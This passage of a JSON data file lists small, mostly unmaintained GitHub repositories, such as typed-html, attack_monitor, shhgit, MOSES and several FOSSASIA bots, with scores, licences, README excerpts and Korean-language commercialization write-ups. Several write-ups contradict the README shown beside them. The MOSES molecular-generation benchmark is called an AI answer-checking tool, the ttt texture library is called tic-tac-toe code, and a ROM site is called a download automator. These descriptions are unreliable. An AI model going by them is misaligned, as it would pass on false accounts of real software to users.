checked HTML documents inside your\nRust code using roughly [JSX] compatible syntax.\n\n## Not Currently Maintained\n\nThis project is not currently being maintained. If you would like to take over maintainership, please [leave an issue](https://github.com/bodil/typed-html/issues/new).\n\n## Quick Preview\n\n```rust\nlet mut doc: DOMTree<String> = html!(\n    <html>\n        <head>\n            <title>\"Hello Kitty\"</title>\n            <meta name=Metadata::Author content=\"Not Sanrio Co., Ltd\"/>\n        </head>\n        <body>\n            <h1>\"Hello Kitty\"</h1>\n            <p class=\"official\">\n                \"She is not a cat. She is a human girl.\"\n            </p>\n            { (0..3).map(|_| html!(\n                <p class=\"emphasis\">\n                    \"Her name is Kitty White.\"\n                </p>\n       ","composite_score":0.4025,"license_safety_tag":"unknown"},{"name":"yarox24/attack_monitor","github_url":"https://github.com/yarox24/attack_monitor","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":78,"description":"# yarox24/attack_monitor 분석 보고서\n\n## 왜 보물인가\n네트워크 공격을 실시간으로 감시하고 차단하는 보안 시스템으로, 기업의 해킹·악성 접속으로부터 데이터를 보호할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 회사들을 위한 구독형 네트워크 보안 모니터링 대시보드 제공\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# Attack Monitor\r\n\r\nAttack Monitor is Python application written to enhance security monitoring capabilites of Windows 7/2008 (and all later versions) workstations/servers and to automate dynamic analysis of malware. \r\n\r\nCurrent modes (mutually exclusive):\r\n  - Endpoint detection (ED)\r\n  - Malware analysis (on dedicated Virtual Machine)\r\n \r\nBased on events from:\r\n - Windows event logs\r\n - Sysmon\r\n - Watchdog (Filesystem monitoring Python library)\r\n - TShark (only malware analysis mode)\r\n\r\n### Current version\r\n0.9.0 (Alpha)\r\n\r\n### Contact\r\nattack.monitor.github@gmail.com\r\n\r\n# Demo\r\n![demo/ed.gif](https://raw.githubusercontent.com/yarox24/attack_monitor/master/demo/ed.gif)\r\n\r\n\r\n# Supported OS\r\n\r\n* Windows 7, 8, 10 (x86 or x64)\r\n* Windows 2008, 2012, 2016 (x86 or x64)\r\n\r\n# Pre-requirements\r\n\r\n- Powershell 5\r\n- Sysmon (Downloaded, configured and installed by installer.py)\r\n- Python 3.6 (64-bit) - should work on Python 3.x \r\n- Tshark (Malware analysis only)\r\n- Various Python3 libraries (req","composite_score":0.4024,"license_safety_tag":"restricted"},{"name":"Good-Old-Downloads/sg","github_url":"https://github.com/Good-Old-Downloads/sg","stars":7,"language":"JavaScript","license":"GPL-3.0","abandonment_months":38,"description":"# Good-Old-Downloads/sg 저장소 분석\n\n## 왜 보물인가\n오래된 웹사이트나 서비스에서 사라진 파일들을 찾아 복구할 수 있는 도구로, 디지털 자산을 보존하려는 개인과 기업에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업이 사용할 수 있는 \"인터넷 보관소 복구 플랫폼\"으로 월 구독형 서비스 운영\n-","readme_excerpt":"# SceneGames\nA site for scene releases.\n\n### Installing\nSee [INSTALL.md](INSTALL.md)\n\n### Authors\n \n\n### Contributors\nAdditional contributors are added in a comment at the top of the site in [main.twig](templates/main.twig)\n\n### License\n\nThis project is licensed under the GNU General Public License v3.0 - see [LICENSE](LICENSE) for details.\nand/or this [tl;dr](https://tldrlegal.com/license/gnu-general-public-license-v3-(gpl-3))\n\n### Acknowledgments\n\nThe thousands of slow, ad-ridden, hand-uploaded, WordPress-powered sites out there that inspired us to make something not trash.","composite_score":0.4022,"license_safety_tag":"restricted"},{"name":"fossasia/susi_fbbot","github_url":"https://github.com/fossasia/susi_fbbot","stars":13,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":98,"description":"# SUSI Facebook 챗봇 저장소 분석\n\n## 왜 보물인가\n페이스북 메신저를 통해 자동으로 사용자 질문에 답변하는 인공지능 챗봇을 만들 수 있는 오픈소스 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 구독료를 내고 자신의 페이스북 페이지에 자동 답변 봇을 설치하여 고객 상담 비용을 줄일 수 있습니다.\n2. **내부 업","readme_excerpt":"# AskSusi Facebook Messenger Bot\n\nDevelopment [![Build Status](https://travis-ci.org/fossasia/susi_fbbot.svg?branch=development)](https://travis-ci.org/fossasia/susi_fbbot)\nMaster [![Build Status](https://travis-ci.org/fossasia/susi_fbbot.svg?branch=master)](https://travis-ci.org/fossasia/susi_fbbot)\n[![CircleCI](https://img.shields.io/circleci/project/fossasia/susi_fbbot.svg?maxAge=2592000?style=flat-square)](https://circleci.com/gh/fossasia/susi_fbbot)\n[![Code Climate](https://codeclimate.com/github/fossasia/susi_fbbot/badges/gpa.svg)](https://codeclimate.com/github/fossasia/susi_fbbot)\n[![Join the chat at https://gitter.im/fossasia/susi_server](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susi_server)\n\nThis is the  Facebook messenger bot for [AskSusi](https://www.m.me/asksusiai).\n\n## Technology Stack\n\n```node.js``` and ```Express```.\n\n## Getting Started\n\nIt's easy for you to create your own facebook messenger bot and integrate susi's API into it. You can rea","composite_score":0.4022,"license_safety_tag":"restricted"},{"name":"Good-Old-Downloads/rg","github_url":"https://github.com/Good-Old-Downloads/rg","stars":8,"language":"CSS","license":"GPL-3.0","abandonment_months":90,"description":"# Good-Old-Downloads/rg 분석\n\n## 왜 보물인가\n인터넷에서 파일을 자동으로 다운로드하고 관리해주는 도구로, 반복적인 다운로드 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트에서 매일 자동으로 필요한 파일(보고서, 데이터)을 다운받아 정리해주는 클라우드 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"# RetroGames\nA site for ROMs and stuff.\n\n### Installing\nSee [INSTALL.md](INSTALL.md)\n\n### Authors\n \n\n### Contributors\nAdditional contributors are added in a comment at the top of the site in [main.twig](templates/main.twig)\n\n### License\n\nThis project is licensed under the GNU General Public License v3.0 - see [LICENSE](LICENSE) for details.  \nand/or this [tl;dr](https://tldrlegal.com/license/gnu-general-public-license-v3-(gpl-3))\n","composite_score":0.4022,"license_safety_tag":"restricted"},{"name":"fossasia/Flask_Simple_Form","github_url":"https://github.com/fossasia/Flask_Simple_Form","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":61,"description":"# Flask_Simple_Form 분석 보고서\n\n## 왜 보물인가\n복잡한 입력 양식을 쉽게 만들고 관리할 수 있는 도구로, 웹사이트에서 사용자 정보를 수집하는 모든 비즈니스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원가입, 문의하기, 설문조사 등 고객 정보 수집 기능이 필요한 클라우드 서비스\n2. **내부 업무 도구**:","readme_excerpt":"# Flask_Simple_Form\nFlask app with a Simple Form.    \nThis is the repository used for creating examples of Flask (microframework for python).\n","composite_score":0.4021,"license_safety_tag":"restricted"},{"name":"jeasonlzy/okhttp-OkGo","github_url":"https://github.com/jeasonlzy/okhttp-OkGo","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":45,"description":"# okhttp-OkGo 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 앱에서 인터넷 통신을 간단하게 만들어주는 도구로, 개발자들이 복잡한 코딩 없이 데이터를 주고받을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **모바일 앱 개발 플랫폼**: 안드로이드 앱 만드는 회사들이 네트워크 기능을 빠르게 구현할 수 있는 라이브러리로 판매\n- **API 연동 솔루션**","readme_excerpt":"![](http://7xss53.com1.z0.glb.clouddn.com/markdown/aqyyw.jpg)\n\n## OkGo - 3.0 震撼来袭, 一个基于okhttp的标准RESTful风格的网络框架\n\n> 工程结构全新优化  \n支持RxJava  \n支持RxJava2  \n支持自定义缓存策略  \n支持下载管理  \n支持上传管理  \n\n该库部分思想借鉴了以下项目：\n\n * [https://github.com/yanzhenjie/NoHttp](https://github.com/Y0LANDA/NoHttp) \n * [https://github.com/square/retrofit](https://github.com/square/retrofit)\n\n在此特别感谢上述作者，喜欢原作的可以去使用原项目。同时欢迎大家下载体验本项目，如果使用过程中遇到什么问题，欢迎反馈。\n\n## 友情链接\n本项目中使用的图片选择是我的另一个开源项目\n> 完全仿微信的图片选择库，自带矩形图片裁剪和圆形图片裁剪功能，有需要的可以去下载使用。  \n附上地址：[https://github.com/jeasonlzy/ImagePicker](https://github.com/jeasonlzy/ImagePicker)\n\n本项目中的九宫格控件也是我的开源项目\n> 类似QQ空间，微信朋友圈，微博主页等，展示图片的九宫格控件，自动根据图片的数量确定图片大小和控件大小，使用Adapter模式设置图片，对外提供接口回调，使用接口加载图片，支持任意的图片加载框架如：Glide、ImageLoader、xUtils3、Picasso 等，支持点击图片全屏预览大图。  \n附上地址：[https://github.com/jeasonlzy/NineGridView](https://github.com/jeasonlzy/NineGridView)\n\n## 联系方式\n * email： liaojeason@126.com\n * QQ群： 489873144 <a target=\"_blank\" href=\"//shang.qq.com/wpa/qunwpa?idkey=ba5dbb5115a165866ec77d96cb46685d1ad159ab765b79","composite_score":0.4021,"license_safety_tag":"safe"},{"name":"fossasia/susi_desktop","github_url":"https://github.com/fossasia/susi_desktop","stars":13,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":98,"description":"# SUSI Desktop 프로젝트 분석\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 인공지능 챗봇을 개인 컴퓨터에 설치해서 바로 활용할 수 있는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 내부 지원 시스템**: 직원들이 정책, 휴가 신청 등을 챗봇에게 물어보고 자동으로 답변받는 서비스\n2. **고객 상담 자동화 도구**: 전자상","readme_excerpt":"# SUSI Desktop\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/e37a7797d5a74af38b009f991d8352f4)](https://www.codacy.com/app/BrainBuzzer/susi_desktop?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi_desktop&utm_campaign=badger)\n[![Join the chat at https://gitter.im/fossasia/susi_desktop](https://badges.gitter.im/fossasia/susi_desktop.svg)](https://gitter.im/fossasia/susi_desktop?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Build Status](https://travis-ci.org/fossasia/susi_desktop.svg?branch=master)](https://travis-ci.org/fossasia/susi_desktop) [![npm](https://img.shields.io/npm/dt/susi_desktop.svg)](https://www.npmjs.com/package/susi_desktop) [![npm](https://img.shields.io/npm/v/susi_desktop.svg)](https://www.npmjs.com/package/susi_desktop) [![XO code style](https://img.shields.io/badge/code_style-XO-5ed9c7.svg)](https://github.com/sindresorhus/xo)\n[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/fold_","composite_score":0.4021,"license_safety_tag":"restricted"},{"name":"Wechat-Group/weixin-java-tools","github_url":"https://github.com/Wechat-Group/weixin-java-tools","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Wechat-Group/weixin-java-tools 분석\n\n## 왜 보물인가\n중국 최대 메신저인 위챗(WeChat)과 연결되는 프로그램을 만들 때 필요한 기본 도구 모음으로, 관련 비즈니스를 시작할 때 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 고객을 위한 위챗 자동 답변, 메시지 관리 클라","readme_excerpt":"## WxJava - 微信开发 Java SDK\n[![Github](https://img.shields.io/github/stars/binarywang/WxJava?logo=github&style=flat&label=Stars)](https://github.com/binarywang/WxJava)\n[![Gitee](https://gitee.com/binary/weixin-java-tools/badge/star.svg?theme=blue)](https://gitee.com/binary/weixin-java-tools)\n[![GitCode](https://gitcode.com/binary/WxJava/star/badge.svg)](https://gitcode.com/binary/WxJava)\n\n[![GitHub release](https://img.shields.io/github/release/binarywang/WxJava?label=Release)](https://github.com/binarywang/WxJava/releases)\n[![Maven Central](https://img.shields.io/maven-central/v/com.github.binarywang/wx-java?label=Maven)](https://central.sonatype.com/artifact/com.github.binarywang/wx-java/versions)\n[![Build Status](https://img.shields.io/circleci/project/github/binarywang/WxJava/develop.svg?sanitize=true&label=Build)](https://circleci.com/gh/binarywang/WxJava/tree/develop)\n[![使用IntelliJ IDEA开发维护](https://img.shields.io/badge/IntelliJ%20IDEA-支持-blue.svg)](https://www.jetbrains.com/?from=","composite_score":0.402,"license_safety_tag":"safe"},{"name":"fitzgen/dodrio","github_url":"https://github.com/fitzgen/dodrio","stars":5,"language":"Rust","license":"MPL-2.0","abandonment_months":64,"description":"# Dodrio 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션의 속도와 효율성을 획기적으로 높일 수 있는 핵심 기술로, 대규모 사용자를 처리하는 서비스 구축에 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 협업 도구 SaaS**: 구글 문서, 피그마 같은 다중 사용자 동시 편집 플랫폼의 백엔드 기술\n- **고성능 대시보드 API**: 금융사/증권","readme_excerpt":"# Dodrio\n\nA fast, bump-allocated virtual DOM library for Rust and WebAssembly. Note that\nDodrio is still **experimental**.\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n\n\n- [Warning](#warning)\n- [Examples](#examples)\n- [Design](#design)\n  - [Bump Allocation](#bump-allocation)\n  - [Change List as Stack Machine](#change-list-as-stack-machine)\n  - [Library — Not Framework](#library--not-framework)\n\n<!-- END doctoc generated TOC please keep comment here to allow auto update -->\n\n## Warning\n\nI reiterate that Dodrio is in a very **experimental** state. It probably has\nbugs, and no one is using it in production.\n\n## Examples\n\nHere is the classic \"Hello, World!\" example:\n\n```rust\nstruct Hello {\n    who: String,\n}\n\nimpl Render for Hello {\n    fn render<'a>(&self, cx: &mut RenderContext<a>) -> Node<'a> {\n        let who = bumpalo::format!(in cx.bump, \"Hello, {}!\", self.who);\n        div(cx)\n   ","composite_score":0.4019,"license_safety_tag":"unknown"},{"name":"eth0izzle/shhgit","github_url":"https://github.com/eth0izzle/shhgit","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":15,"description":"# eth0izzle/shhgit 상업화 분석\n\n## 왜 보물인가\n이 프로젝트는 인터넷에 공개되어 실수로 노출된 민감한 정보(암호, API 키, 개인정보)를 자동으로 찾아내는 도구로, 기업의 정보 유출을 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 보안 감시 플랫폼**\n- 기업이 월 구독으로 자신의 코드와 저장소를 2","readme_excerpt":"<p align=\"center\">\n<img src=\"./images/logo.png\" height=\"30%\" width=\"30%\" />\n\n# 🚨 shhgit is no longer maintained. If you need support or consultation for your secret scanning endeavours, drop me an e-mail paul@darkport.co.uk 🚨\n\n## **shhgit helps secure forward-thinking development, operations, and security teams by finding secrets across their code before it leads to a security breach.**\n\n![Go](https://github.com/eth0izzle/shhgit/workflows/Go/badge.svg) ![](https://img.shields.io/docker/cloud/build/eth0izzle/shhgit.svg)\n\n<a href=\"https://www.shhgit.com?utm_source=github&utm_medium=opensource&utm_campaign=readme\"><img src=\"https://user-images.githubusercontent.com/97316/90076719-5ee09c80-dcf8-11ea-87c7-c5f3b454f246.gif\" /></a>\n</p>\n\nAccidentally leaking secrets — usernames and passwords, API tokens, or private keys — in a public code repository is a developers and security teams worst nightmare. Fraudsters constantly scan public code repositories for these secrets to gain a foothold in t","composite_score":0.4019,"license_safety_tag":"safe"},{"name":"fossasia/susi_tweetbot","github_url":"https://github.com/fossasia/susi_tweetbot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":100,"description":"# SUSI Tweetbot 상용화 분석\n\n## 왜 보물인가\n트위터에서 자동으로 질문에 답변해주는 AI 봇으로, 소셜 미디어 고객 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업이 월 구독으로 자신의 트위터 계정에 AI 봇을 연결하여 고객 문의 자동 응답 서비스\n2. **내부 업무 도구**: 대기업의 소셜","readme_excerpt":"# susi_tweetbot\n[![Build Status](https://travis-ci.org/fossasia/susi_tweetbot.svg?branch=master)](https://travis-ci.org/fossasia/susi_tweetbot)\n\n# How to chat with Susi AI bot on Twitter\nVisit your twitter account and tweet to @SusiAI1 with your query and enjoy a tweet back from the Susi AI bot account!\n\nAlso, you can enjoy personal chatting with Susi. Follow the SUSI AI account on twitter [here](https://twitter.com/SusiAI1) and have a personal chat with it.\n![twitter chat](/docs/images/twitterChat.PNG)\n\n# Getting Started : Twitter Susi AI Bot Installation \nWe will make a Susi messenger bot account on Twitter. This account will tweet back when it's name is mentioned in a tweet. Also, 1-on-1 auto chat will be inculcated to our account.\n\nMake a new account, which you want to use as the bot account. You can make one from [here](https://www.twitter.com).\n\n## Prerequisites\nTo create your account on -:\n1. Twitter\n2. Github\n3. Heroku\n\n## Setup your own Messenger Bot\n1. Fork this repository.\n\n","composite_score":0.4019,"license_safety_tag":"restricted"},{"name":"fossasia/open-event-legacy","github_url":"https://github.com/fossasia/open-event-legacy","stars":12,"language":"Python","license":"GPL-3.0","abandonment_months":61,"description":"# open-event-legacy 상용화 분석\n\n## 왜 보물인가\n행사 관리에 필요한 티켓, 참가자, 일정 등을 한 곳에서 처리할 수 있는 완성된 소프트웨어로, 콘서트·컨퍼런스·축제 운영 기관에 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독료를 받고 행사 주최자들이 온라인으로 티켓 판매·참가자 관리를 하도록 제공\n","readme_excerpt":"![Open Event Server](https://storage.googleapis.com/eventyay.com/assets/branding/server_branding.png)\n\nThe Open Event Orga Server enables organizers to manage events from concerts to conferences and meet-ups. It offers features for events with several tracks and venues. Event managers can create invitation forms for speakers and build schedules in a drag and drop interface. The event information is stored in a database. The system provides API endpoints to fetch the data, and to modify and update it. Organizers can import and export event data in a standard compressed file format that includes the event data in JSON and binary media files like images and audio.\n\n[![GitHub release](https://img.shields.io/badge/release-1.0.0--alpha.10-blue.svg?style=flat-square)](https://github.com/fossasia/open-event-legacy/releases/latest)\n[![Travis branch](https://img.shields.io/travis/fossasia/open-event-legacy/master.svg?style=flat-square)](https://travis-ci.org/fossasia/open-event-legacy)\n[![Gemnas","composite_score":0.4018,"license_safety_tag":"restricted"},{"name":"phoboslab/ttt","github_url":"https://github.com/phoboslab/ttt","stars":7,"language":"HTML","license":"unknown","abandonment_months":20,"description":"# phoboslab/ttt 분석\n\n## 왜 보물인가\n3줄 틱택토(○×게임)를 다루는 저장소로, 게임 인공지능이나 간단한 게임 개발의 기초 학습 자료로 활용될 수 있는 교육용 코드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 학습 플랫폼 SaaS**: 초급자를 위한 게임 개발 강의 콘텐츠로 활용하여 월 구독료 수익화\n2. **AI 훈련 도구 판매**:","readme_excerpt":"# Tiny Texture Tumbler\n\nA small JS library to create textures. Mainly useful for file size restricted \ncompetitions. Used with much success in [Q1k3](https://phoboslab.org/log/2021/09/q1k3-making-of).\n\n![Example](https://phoboslab.org/content/assets/q1k3-textures.png)\n\n# Editor\n\n- [phoboslab.org/ttt](https://phoboslab.org/ttt/) (empty workspace)\n- [phoboslab.org/ttt/#W1s2NCw2NC...](https://phoboslab.org/ttt/#W1s2NCw2NCwwLDIsMywxLjQsMiwxNzE3NiwxLjNdLFs2NCw2NCwzODc1MSwxLDE4LDQsMiwyLDI3LDksNjU1MzAsMCw3LDEsLTEsOSwxMyw1LDUyLDgsOCw2NTUyOCwzOTAzOSw0LDAsMCwwLDY0LDUxMiwxNSw0LDAsMCwwLDY0LDY0LDE0XSxbNjQsNjQsMzg3NTEsMSwxOCw0LDIsMiwyNyw5LDY1NTMwLDAsNywxLC0xLDAsMTMsNjQsNTIsNjQsOCw2NTUzMSwzOTAzOSw0LDAsMCwwLDY0LDUxMiwxNSw0LDAsMCwwLDY0LDY0LDE0XSxbNjQsNjQsMTMxMTksNCwxLDAsMCw2NCw2NCwxNSwwLDI0LDExLDE3LDUwLDY1NTIzLDIsOF0sWzMyLDMyLDIxODM5LDEsMCwyLDEwLDIsMTEsNCw2NTUyOCwxMCwyNTkzMSw0LDAsMCwwLDMyLDMyLDE0XSxbMzIsMzIsMTc0ODcsMCwxLDEsMzAsMzAsNjU1MjgsMTEsMjE1ODAsNCwwLDAsMCwzMiwzMiwxNV0sWzMyLDMyLDMwMDE1LDQsNSwwLDAs","composite_score":0.4018,"license_safety_tag":"unknown"},{"name":"molecularsets/moses","github_url":"https://github.com/molecularsets/moses","stars":11,"language":"Python","license":"mit","abandonment_months":23,"description":"# MOSES 저장소 분석\n\n## 왜 보물인가\n인공지능이 생성한 답변의 정확성을 자동으로 검증하는 도구로, AI 서비스 품질 관리의 핵심 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **챗봇 SaaS**: 고객 지원 AI의 답변 정확도를 실시간으로 모니터링하고 신뢰도 등급을 표시하는 기능\n2. **의료/법무 AI 플랫폼**: 의사/변호사 보조 AI의","readme_excerpt":"# Molecular Sets (MOSES): A benchmarking platform for molecular generation models\n\n[![Build Status](https://travis-ci.com/molecularsets/moses.svg?branch=master)](https://travis-ci.com/molecularsets/moses) [![PyPI version](https://badge.fury.io/py/molsets.svg)](https://badge.fury.io/py/molsets)\n\nDeep generative models are rapidly becoming popular for the discovery of new molecules and materials. Such models learn on a large collection of molecular structures and produce novel compounds. In this work, we introduce Molecular Sets (MOSES), a benchmarking platform to support research on machine learning for drug discovery. MOSES implements several popular molecular generation models and provides a set of metrics to evaluate the quality and diversity of generated molecules. With MOSES, we aim to standardize the research on molecular generation and facilitate the sharing and comparison of new models.\n\n__For more details, please refer to the [paper](https://arxiv.org/abs/1811.12823).__\n\nIf you","composite_score":0.4018,"license_safety_tag":"safe"},{"name":"bitcoin-studio/Bitcoin-Programming-with-BitcoinJS","github_url":"https://github.com/bitcoin-studio/Bitcoin-Programming-with-BitcoinJS","stars":5,"language":"CSS","license":"MPL-2.0","abandonment_months":41,"description":"# Bitcoin-Programming-with-BitcoinJS 분석\n\n## 왜 보물인가\n비트코인 거래를 직접 프로그래밍할 수 있도록 가르치는 교육 자료로, 암호화폐 산업의 기술 인력 부족을 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소의 교육 플랫폼 SaaS**: 신입 개발자 교육용 온라인 과정으로 월 구독료 수취\n2. **블","readme_excerpt":"= Bitcoin Programming with BitcoinJS, Bitcoin Core and LND\n\nWelcome to the non-official _Bitcoin Programming with BitcoinJS_ extensive guide! You will learn how to create various types of Bitcoin transactions using the https://github.com/bitcoinjs/bitcoinjs-lib[BitcoinJS^] library.\n\nWe will use the Bitcoin Core command-line interface in Regtest mode for various common tasks, as well as some complementary libraries like `bx` aka https://github.com/libbitcoin/libbitcoin-explorer[Libbitcoin Explorer^].\n\nThroughout this guide, we want to provide you with sufficient explanation to each command to understand it without drowning in information. You can refer to additional resources to better understand the Bitcoin protocol. For example, check out our https://www.bitcoin-studio.com/resources[Bitcoin Studio presentations^].\n\nAt the moment, Bitcoin Javascript tutorials are still very scarce, but we believe it doesn't have to be this way. The following guide intends to address this problem.\n\nThis","composite_score":0.4018,"license_safety_tag":"unknown"},{"name":"fossasia/susi_telegrambot","github_url":"https://github.com/fossasia/susi_telegrambot","stars":11,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":93,"description":"# SUSI Telegram Bot 사업화 분석\n\n## 왜 보물인가\n인공지능 챗봇을 메신저 앱에서 바로 사용할 수 있게 연결해주는 기술로, 별도 앱 설치 없이 많은 사람들이 이미 쓰는 채널에서 AI 서비스를 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객 상담 자동화 SaaS**: 쇼핑몰, 은행, 통신사가 텔레그램을 통해 24시간 자동 상담","readme_excerpt":"# AskSusi Telegram Bot \n\n[![Build Status](https://travis-ci.org/fossasia/susi_telegrambot.svg?branch=development)](https://travis-ci.org/fossasia/susi_telegrambot)\n[![CircleCI](https://img.shields.io/circleci/project/fossasia/susi_telegrambot.svg?maxAge=2592000?style=flat-square)](https://circleci.com/gh/fossasia/susi_telegrambot)\n[![Code Climate](https://codeclimate.com/github/fossasia/susi_telegrambot/badges/gpa.svg)](https://codeclimate.com/github/fossasia/susi_telegrambot)\n\nThis is the Telegram bot for [AskSusi](https://github.com/fossasia/susi_server).\n\nTo set up your own Telegram Bot for Susi, please check out the [Installation document](/docs/INSTALLATION_TELEGRAM.md).\n\n![Susi Telegram](/docs/images/telegram_screenshot.png \"Susi Telegram\")\n\n## Technology Stack\n\n```node.js``` and ```Express```.\n\n## Branch Policy\n\nThe default branch is ```development```, so make sure you contribute only on this branch.\n\n## License\n\nThis project is licensed under the GNU GENERAL PUBLIC LICENSE, Ver","composite_score":0.4018,"license_safety_tag":"restricted"},{"name":"fossasia/fossasia-subscriptions","github_url":"https://github.com/fossasia/fossasia-subscriptions","stars":11,"language":"CSS","license":"GPL-2.0","abandonment_months":68,"description":"# fossasia-subscriptions 분석 보고서\n\n## 왜 보물인가\n온라인으로 정기 구독 서비스를 운영하는 모든 기업이 필요로 하는 '자동 결제 및 고객 관리' 시스템의 핵심 코드입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월간 구독료를 받는 클라우드 소프트웨어(예: 디자인 도구, 번역 앱)의 결제 처리 시스템\n- **내부 업무","readme_excerpt":"UNESCO Hackathon\n============\n\nThis is the website for the UNESCO Hackathon at the FOSSASIA Summit 2018:\nhttps://unesco.sciencehack.asia\n","composite_score":0.4017,"license_safety_tag":"restricted"},{"name":"StarWars-Team/geekcloud-ssh","github_url":"https://github.com/StarWars-Team/geekcloud-ssh","stars":7,"language":"Shell","license":"GPL-3.0","abandonment_months":70,"description":"# StarWars-Team/geekcloud-ssh 분석\n\n## 왜 보물인가\n원격 서버에 안전하게 접속하기 위한 핵심 기술로, 기업의 클라우드 인프라 관리에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 서버 관리 플랫폼에서 사용자가 자신의 서버에 안전하게 접속할 수 있도록 지원하는 기능\n2. **내부 업무 도구*","readme_excerpt":"# SSH登录脚本\n![alt](/ssh.jpg)\n## 添加登录启动功能\n\n    cd login-shell\n  \n    mv motd.sh /etc/\n  \n    chmod 755 /etc/motd.sh\n  \n    echo 'sh /etc/motd.sh' >> /etc/profile\n","composite_score":0.4017,"license_safety_tag":"restricted"},{"name":"fossasia/apps.loklak.org","github_url":"https://github.com/fossasia/apps.loklak.org","stars":11,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":91,"description":"# fossasia/apps.loklak.org 사업화 분석\n\n## 왜 보물인가\n소셜 미디어 데이터를 검색하고 분석할 수 있는 오픈소스 플랫폼으로, 마케팅·연구·뉴스 분석이 필요한 모든 조직에서 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: SNS 트렌드 모니터링 서비스 (기업 고객에게 월정액으로 제공)\n- **내부 업무 도구**","readme_excerpt":"# apps.loklak.org\n[![Build Status](https://travis-ci.org/fossasia/apps.loklak.org.svg?branch=master)](https://travis-ci.org/fossasia/apps.loklak.org)\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/fossasia/apps.loklak.org.svg)](http://isitmaintained.com/project/fossasia/apps.loklak.org \"Percentage of issues still open\")\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/fossasia/apps.loklak.org.svg)](http://isitmaintained.com/project/fossasia/apps.loklak.org \"Average time to resolve an issue\")\n[![Twitter](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Wow%20Check%20Loklak%20on%20@gitHub%20@loklak_:%20https://github.com/fossasia/apps.loklak.org%20&url=%5Bobject%20Object%5D)\n[![Twitter Follow](https://img.shields.io/twitter/follow/loklak_.svg?styl","composite_score":0.4017,"license_safety_tag":"restricted"},{"name":"InterviewMap/CS-Interview-Knowledge-Map","github_url":"https://github.com/InterviewMap/CS-Interview-Knowledge-Map","stars":7,"language":"","license":"unknown","abandonment_months":74,"description":"# CS-Interview-Knowledge-Map 분석\n\n## 왜 보물인가\n취업 면접을 준비하는 사람들이 컴퓨터 과학의 핵심 개념들을 체계적으로 학습할 수 있는 맞춤형 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 면접 준비 구독 서비스로 체계화된 학습 경로와 진도율 추적 기능 제공\n2. **기업 신입 교육 플랫폼*","readme_excerpt":"<img align=\"center\" src='./InterviewMap.png' />\n\n<h1 align=\"center\">\n  Interview Map\n</h1>\n\n<h4 align=\"center\">这是一份能让你更好准备下一次面试的图谱</h4>\n\n[English Version](./README-EN.md)\n\n## 阅读\n\n| 微信扫码关注公众号，订阅更多精彩内容                                                                 | 加笔者微信进群与大厂大佬讨论技术                                                                    |\n| ---------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------- |\n| <img src=\"https://yck-1254263422.cos.ap-shanghai.myqcloud.com/20191220223702.jpeg\" width=\"500px;\" /> | <img src=\"https://yck-1254263422.cos.ap-shanghai.myqcloud.com/20191220224224.png\" width=\"260px;\" /> |\n\n[线上版本阅读更清晰](https://yuchengkai.cn/docs/zh/)\n\n## 小册\n\n很荣幸在「掘金」平台发售了这个开源项目的进阶版面试小册「前端面试之道」。\n\n<p align=\"center\">\n  <img src='https://user-gold-cdn.xitu.io/2018/12/25/167e354c41bbe3ef?w=750&h=1334&f=jpeg&s=110064' width='400' 